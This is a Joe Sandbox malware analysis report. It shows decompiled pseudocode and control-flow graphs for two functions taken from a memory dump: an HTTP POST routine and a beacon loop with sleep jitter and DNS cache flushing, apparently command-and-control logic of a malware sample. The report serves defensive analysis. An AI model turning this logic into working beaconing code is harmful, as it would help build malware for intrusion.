call 287be88 1173->1178 1179 287ad9f-287adaa 1173->1179 1174->1172 1191 287ad50-287ad6b call 287ab6a call 28619d6 1174->1191 1178->1164 1193 287adff-287ae23 call 286161b 1178->1193 1184 287adde-287ade5 1179->1184 1185 287adac 1179->1185 1180->1164 1186 287adb2 1181->1186 1187 287af09-287af0c 1181->1187 1184->1178 1192 287ade7-287adee 1184->1192 1185->1186 1186->1164 1187->1186 1190 287af12-287af16 1187->1190 1190->1164 1191->1170 1192->1164 1192->1178 1193->1164 1199 287ae25-287ae41 1193->1199 1202 287ae43-287ae48 1199->1202 1203 287ae6d-287ae76 1199->1203 1202->1203 1204 287ae4a-287ae56 1202->1204 1208 287ae98-287ae9c 1203->1208 1209 287ae78-287ae7c 1203->1209 1206 287ae67-287ae6b 1204->1206 1207 287ae58-287ae65 call 28617b4 1204->1207 1206->1199 1207->1206 1207->1208 1212 287ae9e-287aec7 call 2875882 call 287aa2a 1208->1212 1213 287aed9 1208->1213 1209->1208 1211 287ae7e-287ae96 call 28617b4 1209->1211 1211->1199 1211->1208 1212->1213 1225 287aec9-287aed7 call 287afa1 1212->1225 1215 287aeda-287aee0 call 28617e4 1213->1215 1215->1164 1225->1215
                        C-Code - Quality: 47%
                        			E0287ABCB(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				void* _v48;
				char _v316;
				void* __ebx;
				void* __edi;
				void* _t108;
				void* _t109;
				int _t115;
				void* _t116;
				intOrPtr _t129;
				signed int _t138;
				char _t146;
				void* _t147;
				void* _t148;
				char* _t158;
				void* _t159;
				char* _t161;
				void* _t162;
				void* _t163;

				_t150 = __ecx;
				_t163 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x64)) != 0xc0 ||  *((intOrPtr*)(__ecx + 0x124)) == 0 ||  *((intOrPtr*)(__ecx + 0x128)) == 0) {
					L49:
					return 0;
				} else {
					_t146 = 4;
					_v16 = 0;
					_v28 = 1;
					_v20 = 0;
					_v36 = _t146;
					_v44 = 0;
					_v40 = 0x1234;
					_v12 = 0x80080200;
					if(( *(__ecx + 0x82) & 0x00000001) != 0) {
						_v12 = 0x80883200;
					}
					_t158 =  &_v316;
					E0287B4A9(_t150, _t158, _t163);
					 *0x289fbc4( *((intOrPtr*)(_t163 + 0x128)), 0x4d,  &_v28, _t146);
					_t159 =  *0x289fc18( *((intOrPtr*)(_t163 + 0x128)), "POST", _t158, "HTTP/1.1", 0, 0, _v12,  &_v40);
					_v12 = _t159;
					if(_t159 == 0) {
						goto L49;
					} else {
						if(( *(_t163 + 0x82) & 0x00000001) != 0) {
							E0287AB6A(_t150, _t159);
						}
						 *(_t163 + 0x12c) = _t159;
						_v28 = 1;
						 *0x289fbc4(_t159, 0x4d,  &_v28, _t146);
						_t157 = _t163 + 0x8a;
						_t151 = _t163 + 0x8a;
						if(E028747E9(_t157, E028619D6(_t163 + 0x8a)) ==  *((intOrPtr*)(_t163 + 0x72))) {
							 *((intOrPtr*)(_t163 + 0x130)) = 1;
						} else {
							 *((intOrPtr*)(_t163 + 8)) = _t146;
						}
						_v8 = _v8 & 0x00000000;
						_t108 = E0287B56D(_t151, _t163,  &_v8); // executed
						_t147 = _t108;
						_v48 = _t147;
						if(_t147 == 0) {
							L24:
							_t109 =  *(_t163 + 0x12c);
							if(_t109 != 0) {
								 *0x289fbb8(_t109);
							}
							 *(_t163 + 0x12c) =  *(_t163 + 0x12c) & 0x00000000;
							return _v16;
						} else {
							if(E028619D6(_t147) < 1 || _v8 == 0) {
								L23:
								E028617E4(_v48);
								goto L24;
							} else {
								_t161 = "Content-Type: application/x-www-form-urlencoded";
								_t153 = _t161;
								_t115 = HttpSendRequestA( *(_t163 + 0x12c), _t161, E028619D6(_t161), _t147, _v8); // executed
								if(_t115 != 0) {
									L18:
									if(_t115 != 1) {
										L44:
										_t116 =  *0x289f884();
										if(_t116 != 0x2ee7) {
											if(_t116 == 0x2efd || _t116 == 2) {
												L22:
												_v16 = _v16 | 0xffffffff;
											} else {
												_v16 = _v16 & 0x00000000;
											}
											goto L23;
										}
										_v16 = 0xfffffffd;
										goto L23;
									}
									_push( &_v44);
									_push( &_v36);
									_push( &_v20);
									_push(0x20000013);
									_push(_v12);
									if( *0x289fc08() != 1) {
										L29:
										if(E0287BE88(_t153,  *(_t163 + 0x12c)) == 0) {
											goto L23;
										}
										_v8 = _v8 & 0x00000000;
										_v24 = _v24 & 0x00000000;
										_v12 = _v12 & 0x00000000;
										_t148 = 0x1394;
										_v32 = 0x800;
										_t162 = E0286161B(0x1394);
										if(_t162 == 0) {
											goto L23;
										} else {
											goto L31;
										}
										while(1) {
											L31:
											_push( &_v8);
											_push(_v32);
											_push(_v24 + _t162);
											_push( *(_t163 + 0x12c));
											if( *0x289fbe4() != 1) {
												break;
											}
											_t138 = _v8;
											if(_t138 == 0) {
												break;
											}
											_v24 = _v24 + _t138;
											_t76 = _t148 - 0x801; // 0xb93
											if(_v24 < _t76) {
												L35:
												_v8 = _v8 & 0x00000000;
												continue;
											}
											_t148 = _t148 + _t148;
											_t162 = E028617B4(_t162, _t148);
											if(_t162 == 0) {
												L39:
												if(_v24 < 0x5d) {
													L42:
													L43:
													E028617E4(_t162);
													goto L23;
												}
												_t129 =  *0x289f908();
												_t154 =  *0x289f2e8;
												 *((intOrPtr*)( *0x289f2e8 + 0x3a)) = _t129;
												E02875882(_t154 + 0x36);
												E0287AA2A(_t162, _t154 + 0x36, _t163 + 0x112);
												if( *((intOrPtr*)(_t162 + 8)) != 0x5c) {
													goto L42;
												}
												_v16 = E0287AFA1(_t163, _t162, _v24);
												goto L43;
											}
											goto L35;
										}
										if( *0x289f884() == 0x7a && _v12 < 8) {
											_t148 = _t148 + _t148;
											_v12 = _v12 + 1;
											_v32 = _v32 + _v32;
											_t162 = E028617B4(_t162, _t148);
											if(_t162 != 0) {
												goto L31;
											}
										}
										goto L39;
									}
									_v16 = _v16 & 0x00000000;
									if(_v20 != 0x12e) {
										if(_v20 == 0xc8 || _v20 == 0xcc) {
											goto L29;
										} else {
											goto L23;
										}
									}
									 *0x28a0624 =  *0x28a0624 + 1;
									goto L22;
								}
								if(( *(_t163 + 0x82) & 0x00000001) == 0 || E0287AB2C( *0x289f884()) != 1) {
									goto L44;
								} else {
									 *0x28a061c =  *0x28a061c + 1;
									E0287AB6A(_t153, _v12);
									_t153 = _t161;
									_t115 =  *0x289fc10( *(_t163 + 0x12c), _t161, E028619D6(_t161), _t147, _v8);
									goto L18;
								}
							}
						}
					}
				}
			}































                        0x0287abcb
                        0x0287abd6
                        0x0287abe2
                        0x0287af1b
                        0x00000000
                        0x0287ac02
                        0x0287ac0b
                        0x0287ac0c
                        0x0287ac0f
                        0x0287ac16
                        0x0287ac19
                        0x0287ac1c
                        0x0287ac1f
                        0x0287ac26
                        0x0287ac2d
                        0x0287ac2f
                        0x0287ac2f
                        0x0287ac37
                        0x0287ac3d
                        0x0287ac4f
                        0x0287ac79
                        0x0287ac7b
                        0x0287ac80
                        0x00000000
                        0x0287ac86
                        0x0287ac8d
                        0x0287ac90
                        0x0287ac90
                        0x0287ac9d
                        0x0287aca3
                        0x0287acaa
                        0x0287acb0
                        0x0287acb6
                        0x0287acc7
                        0x0287acce
                        0x0287acc9
                        0x0287acc9
                        0x0287acc9
                        0x0287acd8
                        0x0287ace2
                        0x0287ace7
                        0x0287ace9
                        0x0287acee
                        0x0287adbe
                        0x0287adbe
                        0x0287adc6
                        0x0287adc9
                        0x0287adc9
                        0x0287adcf
                        0x00000000
                        0x0287acf4
                        0x0287acfe
                        0x0287adb6
                        0x0287adb9
                        0x00000000
                        0x0287ad0e
                        0x0287ad11
                        0x0287ad17
                        0x0287ad26
                        0x0287ad2e
                        0x0287ad77
                        0x0287ad7a
                        0x0287aee5
                        0x0287aee5
                        0x0287aef0
                        0x0287af03
                        0x0287adb2
                        0x0287adb2
                        0x0287af12
                        0x0287af12
                        0x0287af12
                        0x00000000
                        0x0287af03
                        0x0287aef2
                        0x00000000
                        0x0287aef2
                        0x0287ad83
                        0x0287ad87
                        0x0287ad8b
                        0x0287ad8c
                        0x0287ad91
                        0x0287ad9d
                        0x0287adf0
                        0x0287adfd
                        0x00000000
                        0x00000000
                        0x0287adff
                        0x0287ae03
                        0x0287ae07
                        0x0287ae11
                        0x0287ae13
                        0x0287ae1f
                        0x0287ae23
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0287ae25
                        0x0287ae25
                        0x0287ae28
                        0x0287ae29
                        0x0287ae31
                        0x0287ae32
                        0x0287ae41
                        0x00000000
                        0x00000000
                        0x0287ae43
                        0x0287ae48
                        0x00000000
                        0x00000000
                        0x0287ae4a
                        0x0287ae4d
                        0x0287ae56
                        0x0287ae67
                        0x0287ae67
                        0x00000000
                        0x0287ae67
                        0x0287ae58
                        0x0287ae61
                        0x0287ae65
                        0x0287ae98
                        0x0287ae9c
                        0x00000000
                        0x0287aeda
                        0x0287aedb
                        0x00000000
                        0x0287aedb
                        0x0287ae9e
                        0x0287aea4
                        0x0287aeaa
                        0x0287aeb0
                        0x0287aebe
                        0x0287aec7
                        0x00000000
                        0x00000000
                        0x0287aed4
                        0x00000000
                        0x0287aed4
                        0x00000000
                        0x0287ae65
                        0x0287ae76
                        0x0287ae81
                        0x0287ae85
                        0x0287ae8a
                        0x0287ae92
                        0x0287ae96
                        0x00000000
                        0x00000000
                        0x0287ae96
                        0x00000000
                        0x0287ae76
                        0x0287ad9f
                        0x0287adaa
                        0x0287ade5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0287ade5
                        0x0287adac
                        0x00000000
                        0x0287adac
                        0x0287ad37
                        0x00000000
                        0x0287ad50
                        0x0287ad53
                        0x0287ad59
                        0x0287ad61
                        0x0287ad71
                        0x00000000
                        0x0287ad71
                        0x0287ad37
                        0x0287acfe
                        0x0287acee
                        0x0287ac80

                        APIs
                        • HttpSendRequestA.WININET(?,Content-Type: application/x-www-form-urlencoded,00000000,00000000,00000000,00000000,?,00000000), ref: 0287AD26
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: HttpRequestSend
                        • String ID: Content-Type: application/x-www-form-urlencoded$HTTP/1.1$POST$]
                        • API String ID: 360639707-1613543735
                        • Opcode ID: 52dc5ac61f951d6dd7c5f65c34977344a90fa26a1e3622163c58737dbd1ac55f
                        • Instruction ID: 778b68a46057f1709617fee519cd6b458ab7be1595a66b21d29d10406168e5c7
                        • Opcode Fuzzy Hash: 52dc5ac61f951d6dd7c5f65c34977344a90fa26a1e3622163c58737dbd1ac55f
                        • Instruction Fuzzy Hash: 9D91C27ED00208EFDB29DBA4C848BFEBBB9EB45319F144819E559E2280DB74DA50CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028707D7 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 362sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1376 28707d7-2870818 call 2863145 call 2874b26 1381 2870821-2870828 1376->1381 1382 287081a-2870820 1376->1382 1383 2870831 1381->1383 1384 287082a-287082f 1381->1384 1385 2870836-287084c call 2863145 1383->1385 1384->1385 1389 2870853-2870861 call 28855ff call 288543c 1385->1389 1390 287084e call 2870d19 1385->1390 1396 2870866-2870880 call 28614db 1389->1396 1390->1389 1399 28708b3-28708ba 1396->1399 1400 2870882-2870889 1396->1400 1403 28708bc-28708c6 call 286cb19 1399->1403 1404 28708cb-28708d8 1399->1404 1401 287089d-28708ae 1400->1401 1402 287088b-2870899 1400->1402 1401->1399 1402->1401 1416 287089b 1402->1416 1406 2870c8c-2870c97 1403->1406 1405 28708de-28708e3 1404->1405 1404->1406 1405->1396 1408 28708e5-287091f call 2870da7 call 287499d call 28749db 1405->1408 1409 2870c9c-2870cb0 1406->1409 1410 2870c99-2870c9b 1406->1410 1408->1406 1431 2870925-287092d 1408->1431 1414 2870cb2-2870cb8 1409->1414 1415 2870cbf-2870cc7 1409->1415 1410->1409 1414->1415 1418 2870cba 1414->1418 1419 2870cd2-2870cff call 28614db * 2 Sleep 1415->1419 1420 2870cc9-2870cd0 call 287a62a 1415->1420 1416->1401 1418->1415 1419->1396 1420->1419 1432 2870933-287093b 1431->1432 1433 2870c7f-2870c88 1431->1433 1432->1433 1434 2870941-287094b 1432->1434 1433->1406 1434->1433 1435 2870951-2870959 1434->1435 1436 287095b-2870968 1435->1436 1437 287096a-287096d 1435->1437 1436->1437 1438 2870975-287098f call 28614db 1436->1438 1437->1438 1441 28709d7-2870a6f call 286e987 call 2861493 1438->1441 1442 2870991-2870994 1438->1442 1462 2870a71-2870a73 1441->1462 1463 2870aa0-2870aa6 1441->1463 1443 2870996-287099f 1442->1443 1444 28709d4-28709d6 1442->1444 1443->1444 1447 28709a1-28709b9 call 287f011 1443->1447 1444->1441 1447->1444 1452 28709bb-28709bd 1447->1452 1454 28709c1-28709cd call 28617e4 1452->1454 1455 28709bf 1452->1455 1454->1444 1459 28709cf-28709d2 1454->1459 1455->1454 1459->1441 1465 2870a74 1462->1465 1463->1462 1464 2870aa8-2870aab 1463->1464 1464->1462 1466 2870aad-2870ab1 1464->1466 1467 2870a78 1465->1467 1468 2870ab3-2870ab7 1466->1468 1469 2870abb-2870abf 1466->1469 1470 2870a80-2870a8c 1467->1470 1468->1462 1471 2870ab9 1468->1471 1469->1462 1472 2870ac1-2870ac9 1469->1472 1470->1406 1473 2870a92-2870a9b 1470->1473 1471->1472 1474 2870ae7-2870af9 call 287a6e9 1472->1474 1475 2870acb-2870ad2 1472->1475 1473->1406 1474->1462 1479 2870aff-2870b16 call 28619d6 1474->1479 1475->1474 1476 2870ad4-2870adf 1475->1476 1476->1474 1479->1462 1482 2870b1c-2870b1f 1479->1482 1482->1462 1483 2870b25-2870b28 1482->1483 1483->1462 1484 2870b2e-2870b30 1483->1484 1484->1462 1485 2870b36-2870b6e call 2861493 * 2 1484->1485 1491 2870bd3-2870be1 call 287a8e1 1485->1491 1492 2870b70-2870b7c call 288524a 1485->1492 1497 2870be3-2870bef call 287be49 1491->1497 1498 2870bf1-2870bff call 287a99e 1491->1498 1496 2870b81-2870b85 1492->1496 1499 2870b87-2870b91 1496->1499 1500 2870bb0-2870bb8 1496->1500 1507 2870ba2-2870ba4 1497->1507 1498->1497 1508 2870c01-2870c08 call 287abcb 1498->1508 1511 2870b93-2870b9b call 28855a1 1499->1511 1512 2870ba9-2870bae call 2885420 1499->1512 1509 2870bc7-2870bcc 1500->1509 1510 2870bba-2870bc5 1500->1510 1514 2870c44-2870c4b 1507->1514 1522 2870c0d-2870c1f call 287be49 1508->1522 1509->1491 1517 2870bce-2870bd1 1509->1517 1510->1491 1510->1509 1511->1512 1524 2870b9d call 2885420 1511->1524 1512->1509 1514->1465 1520 2870c51-2870c59 1514->1520 1518 2870c26-2870c37 1517->1518 1518->1467 1520->1465 1528 2870c21-2870c24 1522->1528 1529 2870c5e-2870c67 1522->1529 1524->1507 1528->1518 1531 2870c3c-2870c3e 1528->1531 1529->1465 1530 2870c6d-2870c7a 1529->1530 1530->1470 1531->1465 1531->1514
                        C-Code - Quality: 66%
                        			E028707D7(void* __eflags) {
				signed int _v184;
				char _v330;
				signed int _v334;
				short _v344;
				char _v350;
				char _v364;
				char _v464;
				char _v468;
				char _v602;
				signed int _v620;
				signed int _v622;
				signed int _v638;
				char _v640;
				char _v644;
				char _v648;
				char _v660;
				char* _v724;
				intOrPtr _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				short _v744;
				signed int _v748;
				signed int _v752;
				char _v756;
				char _v760;
				signed int _v764;
				signed int _v768;
				signed int _v772;
				signed int _v776;
				signed int _v780;
				intOrPtr _v784;
				signed int _v792;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t108;
				signed int _t110;
				intOrPtr _t112;
				signed char _t117;
				signed int _t118;
				signed int _t133;
				signed int _t136;
				short _t140;
				intOrPtr _t156;
				signed int _t159;
				void* _t162;
				void* _t169;
				signed int _t170;
				signed int _t171;
				signed int _t173;
				signed int _t178;
				signed int _t179;
				void* _t180;
				void* _t181;
				void* _t183;
				short _t185;
				intOrPtr _t186;
				signed int _t188;
				signed int _t192;
				signed int _t195;
				signed int _t200;
				signed int _t204;
				void* _t205;
				intOrPtr _t207;
				void* _t211;
				signed int _t215;
				signed int _t219;
				signed int _t220;
				long _t228;
				signed int _t230;
				signed int _t235;

				_v760 = 0;
				_v752 = 0;
				E02863145(_t207, 0, __eflags,  *0x2897e84, 0x2890278);
				_v756 = 0;
				_v764 = 0;
				_t108 = E02874B26(_t207);
				_t200 = _t108;
				_v752 = _t200;
				if(_t200 == 0) {
					return _t108;
				}
				__eflags =  *0x289f2f4 & 0x00000020;
				if(__eflags == 0) {
					_push(0x9c4);
				} else {
					_push(0xc350);
				}
				 *0x289f90c();
				_t110 = E02863145(_t207, 0, __eflags,  *0x2897e84, 0x2890278); // executed
				__eflags = _t110;
				if(__eflags == 0) {
					E02870D19(_t207, __eflags); // executed
				}
				E028855FF(_t207); // executed
				_t112 = E0288543C(_t207, 0x2890278); // executed
				_t219 = _v748;
				 *0x289ec94 = _t112;
				while(1) {
					E028614DB(_t207,  &_v640, 0, 0xc0);
					__eflags = _v776 - 0x10;
					if(_v776 < 0x10) {
						goto L13;
					}
					L9:
					_t192 =  *0x2899828; // 0x6ce90000
					__eflags = _t192;
					if(_t192 != 0) {
						_t195 =  *0x289f928(_t192, "DnsFlushResolverCache");
						__eflags = _t195;
						if(_t195 != 0) {
							 *_t195();
						}
					}
					__eflags =  *0x28a0618 - 1;
					_t13 =  &_v764;
					 *_t13 = _v764 & 0x00000000;
					__eflags =  *_t13;
					 *0x28a0618 = 0 |  *0x28a0618 != 0x00000001;
					L13:
					__eflags =  *0x28a03e0 - 1;
					if( *0x28a03e0 != 1) {
						_t117 =  *( *0x289f2e8 + 0xa) >> 0xb;
						__eflags = _t117 & 0x00000001;
						if((_t117 & 0x00000001) != 0) {
							L76:
							_t207 =  *0x289f2e8;
							_t118 =  *(_t207 + 0x3e);
							__eflags = _t118;
							if(_t118 == 0) {
								_t118 = 0x78;
							}
							_t228 =  *(_t207 + 0x146) * _t118 * 0x3e8;
							__eflags = _v760 - 1;
							if(_v760 == 1) {
								_t228 = _v752;
								__eflags = _t228;
								if(_t228 == 0) {
									_t228 = 0x1d4c0;
								}
							}
							__eflags = _t219 - 1 - 0xfffe;
							if(_t219 - 1 <= 0xfffe) {
								_t228 = E0287A62A(_t228, _t207);
							}
							E028614DB(_t207,  &_v640, 0, 0xc0);
							E028614DB(_t207,  &_v756, 0, 0x64);
							Sleep(_t228); // executed
							_t200 = _v772;
							do {
								E028614DB(_t207,  &_v640, 0, 0xc0);
								__eflags = _v776 - 0x10;
								if(_v776 < 0x10) {
									goto L13;
								}
								goto L9;
							} while (_v764 >= 0x10);
							E02870DA7(_t207, _t200);
							E0287499D(_t200,  &_v644, _v768 * 0xc0 + _t200 + 0x156, 0xc0);
							_t133 = E028749DB(_v784, _t207,  &_v660);
							__eflags = _t133;
							if(_t133 <= 0) {
								goto L76;
							}
							__eflags = _v640 - 0xc0;
							if(_v640 != 0xc0) {
								L75:
								__eflags = _v764;
								_t97 = _v764 == 0;
								__eflags = _t97;
								_v764 = 0 | _t97;
								goto L76;
							}
							__eflags = _v602;
							if(_v602 == 0) {
								goto L75;
							}
							__eflags = _v620;
							if(_v620 == 0) {
								goto L75;
							}
							__eflags = _v622;
							if(_v622 == 0) {
								L23:
								_t136 = 3;
								_v622 = _t136;
								L24:
								_t220 =  *( *0x289f2e8 + 0x36);
								_push(2);
								_pop(1);
								E028614DB(_t207,  &_v744, 0, 0x64);
								__eflags = _t220;
								if(_t220 == 0) {
									L33:
									_t140 = 0x64;
									_v744 = _t140;
									_v736 = 1;
									_t230 = _v764;
									_v724 =  &_v640;
									_v732 = 0;
									_v728 = _t230;
									E0286E987( &_v640,  &_v640);
									 *0x289f8b4( *0x289f2e8 + 0x106);
									E02861493(_t207,  *0x289f2e8 + 0x46,  &_v648, 0xc0);
									 *0x289f8b8( *0x289f2e8 + 0x106);
									 *0x289f8b4( *0x289f2e8 + 0x106);
									_t156 =  *0x289f2e8;
									 *((intOrPtr*)(_t156 + 0x42)) = _t230;
									 *0x289f8b8(_t156 + 0x106);
									__eflags = _v776 - 0x64;
									_v792 = 0;
									if(_v776 == 0x64) {
										_t159 = _v740;
										__eflags = _t159;
										if(_t159 == 0) {
											goto L34;
										}
										__eflags =  *_t159 - 0xc0;
										if( *_t159 != 0xc0) {
											goto L34;
										}
										__eflags = _v732;
										if(_v732 != 0) {
											__eflags = _v736;
											if(_v736 == 0) {
												goto L34;
											}
											L45:
											__eflags = _v334 & 0x00000001;
											if(__eflags != 0) {
												__eflags =  *0x28a061c - 4;
												if(__eflags > 0) {
													_t67 =  &_v334;
													 *_t67 = _v334 & 0xfffffffe;
													__eflags =  *_t67;
													_t185 = 0x50;
													_v344 = _t185;
												}
											}
											E0287A6E9(_t207,  &_v464, __eflags);
											_t215 = _v740;
											__eflags = _t215;
											if(_t215 == 0) {
												goto L34;
											} else {
												_t162 = E028619D6(_t215 + 0x26);
												_t211 = ( *(_t215 + 0xa6) ^ 0x0000001a) - 1;
												__eflags = _t162 - 0x80;
												if(_t162 > 0x80) {
													goto L34;
												}
												__eflags = _t162 - 4;
												if(_t162 < 4) {
													goto L34;
												}
												__eflags = _t211 - 4;
												if(_t211 < 4) {
													goto L34;
												}
												__eflags = _t162 - _t211;
												if(_t162 != _t211) {
													goto L34;
												}
												E02861493(_t211,  &_v364, _t215, 0xc0);
												E02861493(_t211,  &_v464,  &_v772, 0x64);
												_v184 = 0;
												_t169 =  *0x289fd84( &_v350);
												_t204 = 0xffffffff;
												__eflags = _t169 - 0xffffffff;
												if(_t169 != 0xffffffff) {
													L64:
													_t170 = E0287A8E1(_t211,  &_v468); // executed
													__eflags = _t170;
													if(_t170 != 0) {
														_t171 = E0287A99E( &_v468); // executed
														__eflags = _t171;
														if(_t171 == 0) {
															goto L65;
														}
														_t173 = E0287ABCB( &_v468); // executed
														_t219 = _t173;
														E0287BE49( &_v468);
														__eflags = _t219;
														if(_t219 > 0) {
															_t92 = _t219 - 1; // -1
															__eflags = _t92 - 0xfffe;
															if(_t92 > 0xfffe) {
																L35:
																_t51 =  &_v772;
																 *_t51 = _v772 + 1;
																__eflags =  *_t51;
																L36:
																_v776 = 1;
																L37:
																__eflags = _v772 - (_v638 & 0x0000ffff);
																if(_v772 >= (_v638 & 0x0000ffff)) {
																	_v772 = _v772 & 0x00000000;
																	_v780 = _v780 + 1;
																}
																goto L76;
															}
															_v780 = 0;
															_v776 = 0;
															 *0x28a0624 = 0;
															goto L37;
														}
														__eflags = _t219 - 0xfffffffd;
														if(_t219 != 0xfffffffd) {
															__eflags = _t219 - _t204;
															if(_t219 != _t204) {
																goto L35;
															}
															L71:
															__eflags =  *0x28a0624 - 4;
															if( *0x28a0624 < 4) {
																_v772 = 0xea60;
															}
															goto L35;
														}
														L69:
														_v776 = _v776 & 0x00000000;
														_v784 = _v784 + 1;
														_v772 = 0x3e8;
														goto L36;
													}
													L65:
													E0287BE49( &_v468);
													L58:
													_t219 = _t204;
													goto L71;
												}
												_t178 = E0288524A( &_v330,  &_v780); // executed
												_t235 = _t178;
												__eflags = _t235;
												if(_t235 == 0) {
													_t179 =  *0x289f884();
													__eflags = _t179;
													if(_t179 == 0) {
														L62:
														__eflags = _v780;
														if(_v780 != 0) {
															goto L64;
														}
														_t219 = 0xfffffffd;
														goto L69;
													}
													_t180 =  *0x289fd48();
													__eflags = _t180 - 0x2af9;
													if(_t180 != 0x2af9) {
														goto L64;
													}
													goto L62;
												}
												_t181 =  *0x289fd84( *_t235);
												__eflags = _t181 - 0xffffffff;
												if(_t181 == 0xffffffff) {
													L59:
													E02885420(_t235);
													goto L62;
												}
												_t183 = E028855A1(_t181);
												__eflags = _t183 - 1;
												if(_t183 != 1) {
													goto L59;
												}
												E02885420(_t235);
												goto L58;
											}
										}
										__eflags = _v736;
										if(_v736 != 0) {
											goto L34;
										}
										goto L45;
									}
									L34:
									_t219 = 0xfffffffe;
									goto L35;
								}
								__eflags = _t220 - 1;
								if(_t220 != 1) {
									L32:
									__eflags = 1;
									goto L33;
								}
								_t186 =  *0x289f2e8;
								__eflags =  *(_t186 + 0x16) & 0x00000040;
								if(( *(_t186 + 0x16) & 0x00000040) != 0) {
									goto L32;
								}
								_v760 = 0;
								_t205 = 0;
								_t188 = E0287F011( &_v760, 0, 0);
								__eflags = _v772;
								if(_v772 == 0) {
									goto L32;
								}
								__eflags = _t188;
								if(_t188 != 0) {
									_t205 = 1;
									__eflags = 1;
								}
								E028617E4(_v760);
								__eflags = _t205 - 1;
								if(_t205 != 1) {
									goto L32;
								} else {
									_push(0x10);
									_pop(1);
									goto L33;
								}
							}
							__eflags = _v622 - 0x3e7;
							if(_v622 <= 0x3e7) {
								goto L24;
							}
							goto L23;
						}
						__eflags = _v764 - 0x10;
					}
					E0286CB19(0xbb8);
					goto L76;
				}
			}











































































                        0x028707f6
                        0x028707fa
                        0x028707fe
                        0x02870803
                        0x02870807
                        0x0287080b
                        0x02870810
                        0x02870812
                        0x02870818
                        0x02870820
                        0x02870820
                        0x02870821
                        0x02870828
                        0x02870831
                        0x0287082a
                        0x0287082a
                        0x0287082a
                        0x02870836
                        0x02870845
                        0x0287084a
                        0x0287084c
                        0x0287084e
                        0x0287084e
                        0x02870853
                        0x02870858
                        0x0287085d
                        0x02870861
                        0x02870866
                        0x02870876
                        0x0287087b
                        0x02870880
                        0x00000000
                        0x00000000
                        0x02870882
                        0x02870882
                        0x02870887
                        0x02870889
                        0x02870891
                        0x02870897
                        0x02870899
                        0x0287089b
                        0x0287089b
                        0x02870899
                        0x0287089f
                        0x028708a9
                        0x028708a9
                        0x028708a9
                        0x028708ae
                        0x028708b3
                        0x028708b3
                        0x028708ba
                        0x028708d3
                        0x028708d6
                        0x028708d8
                        0x02870c8c
                        0x02870c8c
                        0x02870c92
                        0x02870c95
                        0x02870c97
                        0x02870c9b
                        0x02870c9b
                        0x02870ca5
                        0x02870cab
                        0x02870cb0
                        0x02870cb2
                        0x02870cb6
                        0x02870cb8
                        0x02870cba
                        0x02870cba
                        0x02870cb8
                        0x02870cc2
                        0x02870cc7
                        0x02870cd0
                        0x02870cd0
                        0x02870ce1
                        0x02870cef
                        0x02870cf5
                        0x02870cfb
                        0x02870866
                        0x02870876
                        0x0287087b
                        0x02870880
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02870880
                        0x028708e6
                        0x02870907
                        0x02870918
                        0x0287091d
                        0x0287091f
                        0x00000000
                        0x00000000
                        0x02870925
                        0x0287092d
                        0x02870c7f
                        0x02870c81
                        0x02870c85
                        0x02870c85
                        0x02870c88
                        0x00000000
                        0x02870c88
                        0x02870933
                        0x0287093b
                        0x00000000
                        0x00000000
                        0x02870943
                        0x0287094b
                        0x00000000
                        0x00000000
                        0x02870951
                        0x02870959
                        0x0287096a
                        0x0287096c
                        0x0287096d
                        0x02870975
                        0x0287097a
                        0x0287097d
                        0x0287097f
                        0x02870988
                        0x0287098d
                        0x0287098f
                        0x028709d7
                        0x028709d9
                        0x028709da
                        0x028709e6
                        0x028709ea
                        0x028709f1
                        0x028709f5
                        0x028709f9
                        0x028709fd
                        0x02870a0d
                        0x02870a2a
                        0x02870a3a
                        0x02870a4b
                        0x02870a51
                        0x02870a56
                        0x02870a5f
                        0x02870a65
                        0x02870a6b
                        0x02870a6f
                        0x02870aa0
                        0x02870aa4
                        0x02870aa6
                        0x00000000
                        0x00000000
                        0x02870aa8
                        0x02870aab
                        0x00000000
                        0x00000000
                        0x02870aad
                        0x02870ab1
                        0x02870abb
                        0x02870abf
                        0x00000000
                        0x00000000
                        0x02870ac1
                        0x02870ac1
                        0x02870ac9
                        0x02870acb
                        0x02870ad2
                        0x02870ad4
                        0x02870ad4
                        0x02870ad4
                        0x02870ade
                        0x02870adf
                        0x02870adf
                        0x02870ad2
                        0x02870aee
                        0x02870af3
                        0x02870af7
                        0x02870af9
                        0x00000000
                        0x02870aff
                        0x02870b02
                        0x02870b10
                        0x02870b11
                        0x02870b16
                        0x00000000
                        0x00000000
                        0x02870b1c
                        0x02870b1f
                        0x00000000
                        0x00000000
                        0x02870b25
                        0x02870b28
                        0x00000000
                        0x00000000
                        0x02870b2e
                        0x02870b30
                        0x00000000
                        0x00000000
                        0x02870b40
                        0x02870b4f
                        0x02870b5c
                        0x02870b63
                        0x02870b69
                        0x02870b6c
                        0x02870b6e
                        0x02870bd3
                        0x02870bda
                        0x02870bdf
                        0x02870be1
                        0x02870bf8
                        0x02870bfd
                        0x02870bff
                        0x00000000
                        0x00000000
                        0x02870c08
                        0x02870c14
                        0x02870c16
                        0x02870c1d
                        0x02870c1f
                        0x02870c5e
                        0x02870c61
                        0x02870c67
                        0x02870a74
                        0x02870a74
                        0x02870a74
                        0x02870a74
                        0x02870a78
                        0x02870a78
                        0x02870a80
                        0x02870a88
                        0x02870a8c
                        0x02870a92
                        0x02870a97
                        0x02870a97
                        0x00000000
                        0x02870a8c
